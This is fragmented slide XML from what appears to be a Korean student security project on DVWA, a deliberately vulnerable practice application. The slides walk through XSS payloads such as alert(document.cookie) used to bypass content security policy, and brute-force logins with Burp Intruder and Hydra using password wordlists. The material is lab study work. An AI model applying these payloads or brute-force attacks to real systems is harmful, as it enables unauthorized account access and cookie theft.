            <a:ext cx="718705" cy="28384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782352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Medium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②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source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 드러난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nonce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값이 참조된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&lt;script&gt;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태그 부분을 복사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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="464320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43A8BA-0D3F-499F-9B73-886B89C5FB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0" r="37681" b="1917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="464320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DA5BB1A-6843-429F-9DE5-9B858073D718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452091" y="3275762"/>
            <a:ext cx="3624610" cy="343457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586830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Medium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③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source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따온 링크 사이에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alert(document.cookie)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코드를 삽입 후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include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 클릭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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="464320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C06BA9-0D57-40A5-9C60-F8E0676D92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r="22672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968501"/>
            <a:ext cx="5901780" cy="464320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B6D6BFE-A29B-42E6-AC54-E89E4AA1A020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874635" y="4104173"/>
            <a:ext cx="718705" cy="31223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919112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Medium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④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팝업이 뜨면서 쿠키 값을 호출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B5CE66D-D887-4058-B14B-673D01414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2" r="22672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901778" cy="464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07557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High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①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CSP Bypass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설정시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impossible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들어가지는 오류가 있으므로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impossible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관련된 모든 자료는 백업 후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자료를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impossible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변경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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968501"/>
            <a:ext cx="5901779" cy="464320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B69F7F6B-E230-4B27-8191-EFF8273C14B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901779" cy="4643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cd /opt/lampp/htdocs/dvwa/vulnerabilities/csp/source</a:t>
            </a:r>
          </a:p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</a:p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ls</a:t>
            </a:r>
          </a:p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high.js			impossible.php			low.php</a:t>
            </a:r>
          </a:p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high.php			jsonp_impossible.php		medium.php</a:t>
            </a:r>
          </a:p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impossible.js		jsonp.php</a:t>
            </a:r>
          </a:p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</a:p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mv impossible.js impossible.js.bak</a:t>
            </a:r>
          </a:p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mv impossible.php impossible.php.bak</a:t>
            </a:r>
          </a:p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</a:t>
            </a:r>
          </a:p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cp high.js impossible.js </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t># cp high.php impossible.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1874856901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High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②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BurpSuite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프록시 설정 후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Proxy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탭의 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Intercept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탭에서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Intercept in on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통해 전송 패킷을 탈취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75E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="46432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286A53B-13D1-4283-8546-EE51A179A8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2" t="17903" r="33777" b="11612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901778" cy="4643208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71A68E-60B9-46D4-B477-6D1E2569D121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761670" y="2942709"/>
            <a:ext cx="790576" cy="28384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DB3BEE5-C643-4E6F-9597-91246A23D1E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1229885" y="2427454"/>
            <a:ext cx="446259" cy="283849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8C49963-1493-43F2-9A7D-C1233F09AD53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408543" y="2580175"/>
            <a:ext cx="593971" cy="312234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809735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High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③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callback=solvesum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부분 확인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ACE6CC-6FFF-4FB5-9724-815035C41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2" t="17668" r="22436" b="11846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901778" cy="46432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D0139EC-F914-4303-B005-44E1816E02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2" t="17903" r="33777" b="11612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968500"/>
            <a:ext cx="5901777" cy="464320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6F4940A-9642-4CE5-82F1-018ECE1E0E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362220" y="3311830"/>
            <a:ext cx="869634" cy="21326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03983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High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③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solvesum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지우고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alert(document.cookie)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코드를 삽입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</a:p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forward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눌러 변조된 패킷을 전송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ACE6CC-6FFF-4FB5-9724-815035C41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2" t="17668" r="22436" b="11846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901778" cy="46432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5D6AFA9-9CBC-460A-B16D-276854B783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1" t="17903" r="33778" b="11611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901778" cy="4643206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6F4940A-9642-4CE5-82F1-018ECE1E0E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362220" y="3311830"/>
            <a:ext cx="1396980" cy="21326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2E1350B-1D1E-433F-9F69-AA08E7E48B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403242" y="2941355"/>
            <a:ext cx="788559" cy="283850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41479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High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④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solvesum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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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변조된 패킷 값을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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ACE6CC-6FFF-4FB5-9724-815035C41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2" t="17668" r="22436" b="11846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901778" cy="464320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A6AA6B7-97C9-4311-9219-527A3C96B8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1990731" y="4358789"/>
            <a:ext cx="1049572" cy="312235"/>
          </a:xfrm>
          <a:prstGeom prst="round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389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Burpsuite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8353D7AC-2052-4B12-9DAD-C967803801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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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prox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] – [Intercept] – [Intercept is on]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기능이 켜져 있으면 비활성화 해준다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</a:p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인터셉트 기능은 모든 요청을 다 확인함으로 실시간으로 요청을 변조 할 때 이외에는 꺼주는게 좋다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78467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High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레벨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⑤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팝업이 뜨면서 쿠키 값을 호출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CBE6BC-0528-4BD1-81CE-104AADFE4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04" b="12312"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968501"/>
            <a:ext cx="5901779" cy="464320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20CA1C-9BD8-4CDD-9402-7A0A9DAF2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2" t="17668" r="22436" b="11846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968500"/>
            <a:ext cx="5901779" cy="464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9215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Impossible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레벨 서버 소스 코드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소스 코드는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레벨과 같다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레벨에서 문제였던 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jsonp.php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수정해 취약점을 해결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jsonp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호출하지만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callback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사용하지 않고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호출하는 기능을 하드코딩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2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49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333FC46E-6CD3-4C16-98D5-0AC57C9F3D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" t="9903" r="11340" b="27929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968499"/>
            <a:ext cx="5913237" cy="46862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14487250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Impossible.js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코드</a:t>
            </a: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high.js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문제였던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callback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보이지 않게 하드 코딩한 것을 확인할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3-13) CSP Bypass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F4FA362E-472F-4BC0-82C1-C7451C5C2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2" t="26382" r="49273" b="38796"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472376" y="1966867"/>
            <a:ext cx="5913237" cy="468628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3C0656E-D727-41B5-9CAC-F2BEC0BC70F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="2412580"/>
            <a:ext cx="2971800" cy="2408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8804491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Ⅳ. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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정리 </a:t>
            </a:r>
            <a:b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</a:br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ko-KR" altLang="en-US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조장 간 토의 요망</a:t>
            </a:r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2F76DF8-02FB-485D-B566-287A266458F2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6" name="평행 사변형 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F23FE49-2C55-4F6E-8C08-28DB8F560A82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평행 사변형 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF0E964A-EB6F-4800-AB23-3B00F6F0FBEA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8" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B05D0FA-6B86-4FD9-A75C-0B4C380BC2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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6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정리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6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B56077-404F-4463-B750-1318DD5A891E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473395" y="3063239"/>
            <a:ext cx="1203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endParaRPr lang="ko-KR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44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8BD7F47-16F7-4569-8C42-5711FB9D9072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859AB7B9-E1ED-4F4B-95C9-1998008A349C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A1466FD8-DB7A-4F65-99CD-09D1490A87C0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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDDD98AD-CF73-44C3-8A21-F94D383CDF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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6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서론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6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01B5F9-C014-48C5-8332-33A05F414C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473395" y="3063239"/>
            <a:ext cx="1203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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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827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Burpsuite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6F870D3-B46C-4133-9774-4C932D2A2F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812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Burp suite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 사용하려면 웹 브라우저와 연결이 필요하기에 위의 경로로 들어가서 설정 화면을 열어준다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528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Burpsuite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B1B7EB62-A3FA-4C19-B88C-8A88AD9E5B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General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탭에서 스크롤을 맨 아래로 내려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Network Proxy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항목의 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Settings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버튼을 누른다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5158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en-US" altLang="ko-KR" sz="28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Burpsuite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설정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C53D9CB4-6977-45FA-B8D3-682D7FE3FE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812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Manual proxy configuration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항목을 체크하고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주소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127.0.0.1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입력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포트번호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8080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을 입력한다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아래 쪽에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No Proxy for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칸에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localhost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나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127.0.0.1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 써 있다면 지운다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707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A6488D59-D465-42F4-9B34-4B98501FAF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설정을 마친 후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Burp Suite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에서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[Proxy] – [Intercept] – [Intercept is on]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으로 설정 한다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우측 주소창에 새로운 주소를 입력하여도 바로 이동하지 않는 것을 확인 할 수 있다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Forward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버튼을 눌러 줘야 다음 화면으로 넘어 간다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85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1A2DE331-D3A2-41CB-B198-0219A6F1B0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우측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DVWA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 아이디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패스워드를 입력하고 로그인 버튼을 눌러 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171450" marR="0" lvl="0" indent="-17145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좌측 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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burpsuite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에서 아이디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,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패스워드가 전송 된 것이 값까지 확인 된다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560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DDB6A099-004D-4870-B34C-3316D236127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이미 지나간 정보는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[Proxy]-[HTTP history]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탭에서 다시 확인 할 수 있다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592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4C800731-164B-49B3-8810-C7230B67C12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우 클릭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send to intruder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을 눌러 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07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8E8C69FD-C874-4AA6-A74B-CD29B2D42F6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812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[Intruder]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탭에 새로운 요청을 하나 확인 할 수 있다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[Intruder] – [2] – [Positions]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으로 가서 보면 쿼리 스트링이라고 하는게 나온다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 부분과 사용자가 입력 한 값이 서버로 전달 되어 변수의 값으로 처리 되는 부분이다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오른쪽 탭의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[Clear $]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버튼으로 값을 다 지워 준다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939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182ED008-1CDB-4F33-93F1-BE664D4A666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패스워드 값만 선택 후 우측의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[ADD$]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눌러준다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239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5F09D131-CF9B-460F-BD7E-5C50B64080B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[Payloads]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탭으로 이동한여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Payload Type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에서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brute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Force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공격을 선택 해 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43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서론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프로젝트 개요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pPr marL="0" indent="0">
              <a:buNone/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8D169E-4954-4796-BF93-02782E15E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99" y="1998507"/>
            <a:ext cx="5307623" cy="1744972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="내용 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49FA7261-323A-4239-A963-DDEE8FBC2DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471487" y="4483114"/>
            <a:ext cx="5902671" cy="4439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OWASP(The Open Web Application Security Project)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웹 애플리케이션 취약점 중 빈도와 영향력을 고려하여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가지를 선정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발표한다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OWASP TOP 10 (2019)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보안 취약점 분석을 바탕으로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DVWA,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XAMPP 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프로그램을 활용</a:t>
            </a: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웹 취약점들의 공격방식을 익히고 이에 따른 방어수단을  연구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>도출</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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하는 것이 주된 프로젝트 목표이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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06897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EA6E91C0-7F7A-4454-893B-49CEBE5272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Payload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Options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보면 일일이 대입할 문자들을 설정 할 수 있다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위의 사진에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="21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a~z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0~9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까지 설정되어 있고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최소길이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자리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최대길이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자리로 설정되어 있을 경우 이다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Payload Sets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Payload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count :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보면 해당 설정에서의 경우의 수가 나온다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894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D7B7C6F9-18AF-44C6-B11D-8F3E2440AB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특수 문자들을 추가 하여 주면 경우의 수가 더 늘어 난 것을 확인 할 수 있다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751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D9CB13D8-4D07-43E6-B887-0A597489D26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최대 길이를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자리 까지 설정 해주면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unknown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이라고 경우의 수를 측정 하지 못 한다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924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0DBA1BB6-B6C1-4E7D-8E0E-4034F204C8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공격 방법은 우측 상단의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Start attack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누른 후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OK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 주면 된다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001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61C60645-3132-4D86-975C-BAE9F4A9B43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위의 사진처럼 실시간으로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brute force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공격을 확인 할 수 있다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9961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250669D-EA13-41A6-8B3E-415ECE89F1A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Length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 눌러 내림 차순으로 만들어 둘 경우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Length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가 다른 값 하나가 나온다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저런 값을 가진 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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playload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가 패스워드일 가능성이 높은 것이다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254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44A20F85-C551-4075-AF00-ED2FE4EC9FF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사전 대입 공격을 위해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kali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리눅스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john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프로그램의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="21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password.lst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에 자주 사용하는 패스워드가 저장되어 있는 파일을 확인 해 준다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8911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EE8B5311-2DBA-4751-AB75-D17A6DFAB0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[Payloads]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탭에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Payload type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Simple list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변경 해준다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82352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78543A9A-A969-424A-B179-00DF0CD1EA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Payload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Options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Load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 앞서 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="21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해둔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경로의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="21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password.lst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파일을 로드 해준다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185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01394743-29BF-4F2C-8264-CFA49A369E6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파일을 로드 하고 나면 상단에 몇 개의 주석 구문이 들어 있으므로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Remove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버튼을 눌러 지워 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167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서론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프로젝트 개요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0E08478-363F-4FA7-975A-AE48F3E261A9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AE3E568F-037B-4215-AF5F-C586D5F243F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471487" y="1968498"/>
            <a:ext cx="5902671" cy="6953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AutoNum type="arabicParenR"/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DF840B-8ED6-43E0-A5BD-02E29EDD6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2" y="1968497"/>
            <a:ext cx="2601019" cy="2771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747F01-E0FA-4897-AF18-95FC3AE80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1890100"/>
            <a:ext cx="3004644" cy="288293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5816CE0-A2E5-40F8-9017-43CCCA80A65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747699" y="5173857"/>
            <a:ext cx="5386091" cy="59645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OWASP TOP 10 (2019)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보안 취약점 분석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4D85B0B-F8DD-4091-A67A-FC76470A7D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724496" y="6483798"/>
            <a:ext cx="5404397" cy="6696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OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 분석 결과를 바탕으로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DVWA, XAMPP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>활용 주요 취약점 공격 진행 및 분석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121B70D-A147-4CD4-8ABB-530D58E81F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747699" y="7981666"/>
            <a:ext cx="5404396" cy="58288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공격 결과를 바탕으로 방어수단 연구 및 도출</a:t>
            </a:r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F65620C8-A821-4E0F-ABE5-B7C1CBEA23DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="5994606"/>
            <a:ext cx="252091" cy="345065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903EF0BA-753E-48D6-B664-6818D39C484C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314698" y="7420046"/>
            <a:ext cx="252091" cy="345065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5448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C6A5B68-E9E5-4554-839A-BA398FAD6CD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Start attack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을 눌러 공격을 시작 한다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4300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A7D37501-52A9-4131-97F4-C7F9009DDC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앞에서 확인 했던 것과 마찬가지로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Length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가 다른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Payload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가 패스워드 인 것을 확인 할 수 있다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921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3524C72F-033C-4FC7-9F93-BEEC0D40E89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구해낸 패스워드를 입력하여 로그인에 성공한 화면이다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5920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370A6F1-0648-4726-826A-BA80D158D6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이번에는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Hydra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 이용하여 공격해보기 위해 잘 못 된 패스워드를 입력하여 로그인에 실패 한 후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URL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보면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~/Brute/:username=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입력 아이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디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&amp;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password=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 패스워드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&amp;Login=Login’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형식인 것을 확인 할 수 있다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실패 시의 메시지도 확인 할 수 있다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7022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32FC4E58-8D32-405E-AACC-858AF7BA2A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하단의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Source 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버튼을 눌러 로그인 페이지의 소스를 볼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특별한 방어 대책은 없는 것을 확인 할 수 있다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20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0C9912D6-BD3A-4461-B486-FADF5B95C22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페이지 내에서 우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View Page Source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로도 소스를 확인 할 수 있다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R="0" lvl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0830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F09DA235-E292-49D8-BB4A-CBB22D8F4DE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F12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키를 눌러서 현재 페이지의 쿠키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(Cookie)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값을 확인 할 수 있다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629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42544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48A71F87-4FCD-4058-9181-7604A60DDE7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본격적으로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hydra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 활용하여 공격해 보기 위해 위의 사진의 경로로 들어가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hydra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 실행 시켜 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1020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AE9E045B-C0A2-4B2B-A8C2-F11D2760F7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hydra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를 실행 후 첫 화면이다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1765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2DC71A47-B6EB-4D42-8118-1BF02406957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사전 대입 공격을 위해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자주 사용하는 패스워드가 들어 있는 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password.txt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파일을 생성해 준다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6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9A351A-DCCD-4BAC-94BF-632B61B5151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8" name="평행 사변형 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D94560D-C34C-4211-8812-E8601EBA9B8D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평행 사변형 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16541F1C-A245-42F8-8FC8-701268C41998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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE419C1-CCEB-48FC-84BE-079C3DB5FC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="1352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44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OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="44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966579-EDC9-4324-B476-6FF19928A34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473395" y="3063239"/>
            <a:ext cx="1203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2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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3357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4886A68-AF22-4D0C-B1EA-F4805EED42F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위 처럼 명령어를 입력 하여 주면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hydra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공격이 실행되어  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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패스워드를 찾아 내는 것을 확인 할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="21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명령어에 대해서는 다음 페이지에서 추가 설명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7252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65F6B49-F820-42BB-BBF5-01A3A0412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Hydra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–l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 아이디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–P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패스워드 파일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[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웹페이지위치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[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방식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[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웹페이지 나머지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URL](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 위치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^USER^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^PASS^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대체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 [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쿠키 값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Hydra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옵션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-l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특정 아이디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-L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아이디 리스트 파일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패스워드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패스워드 사전 파일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-x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무차별 대입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lvl="1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ex)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3:3:1a!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1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     -&gt;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최소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자리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숫자와 소문자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특수문자가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	    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포함된 문자열을 의미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-t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동시에 실행하는 작업 수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-w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대기시간 설정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-v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자세히 보기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-V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login+pass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보여준다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-f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비밀번호를 발견하면 종료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937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160E4577-8860-4778-8A64-384A1F36D3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구해낸 패스워드를 입력하여 로그인에 성공한 화면이다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700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5.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DD8ECCC0-9534-4C7C-8126-FDF2CDB1023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localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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dvwa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 접속 후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DVWA Security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탭을 누르고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Medium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레벨로 설정 해준다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08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5.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6F702CEF-30E1-45EB-A37B-837FED851F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Medium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레벨의 소스와 해석이다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0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5.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40207A75-3E63-4571-BF9D-767F26ABCC7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Medium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레벨의 소스와 해석이다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로그인 실패 했을 경우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초간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sleep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 응답하는 코드를 사용 하여 공격을 지연 시키는 것을 확인 할 수 있다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6667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70A4AB62-B24A-4264-9986-1AC8BF9792A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localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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dvwa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 접속 후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DVWA Security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탭을 누르고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High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레벨로 설정 해준다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9881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16DA1D6E-D576-444B-BCE8-5F8A910CBD4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레벨의 소스와 해석이다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2800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40CA7BB0-0186-465A-AFA1-F75EB281663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high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레벨의 소스와 해석이다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Med</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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ium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설정 했을 때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초간의 동일 간격일 경우에는 해커입장에서는 기다리지 않고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초 내에 응답이 오지 않으면 실패로 간주하고 다음 공격을 바로 실행 할 수 있기때문에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에서는 이 값을 랜덤으로 설정 한 것을 확인 할 수 있다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2073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7.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Impossible)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53E128DB-935A-473D-AB95-BC9F01FA2F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localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="2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dvwa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/ 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에 접속 후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DVWA Security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탭을 누르고 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Impossible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레벨로 설정 해준다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368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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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.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OWASP, DVWA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OWASP TOP 10 2019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 OWASP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Top 10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(2019)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161B0F4-66EF-4F66-84F4-2D82AAC749A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
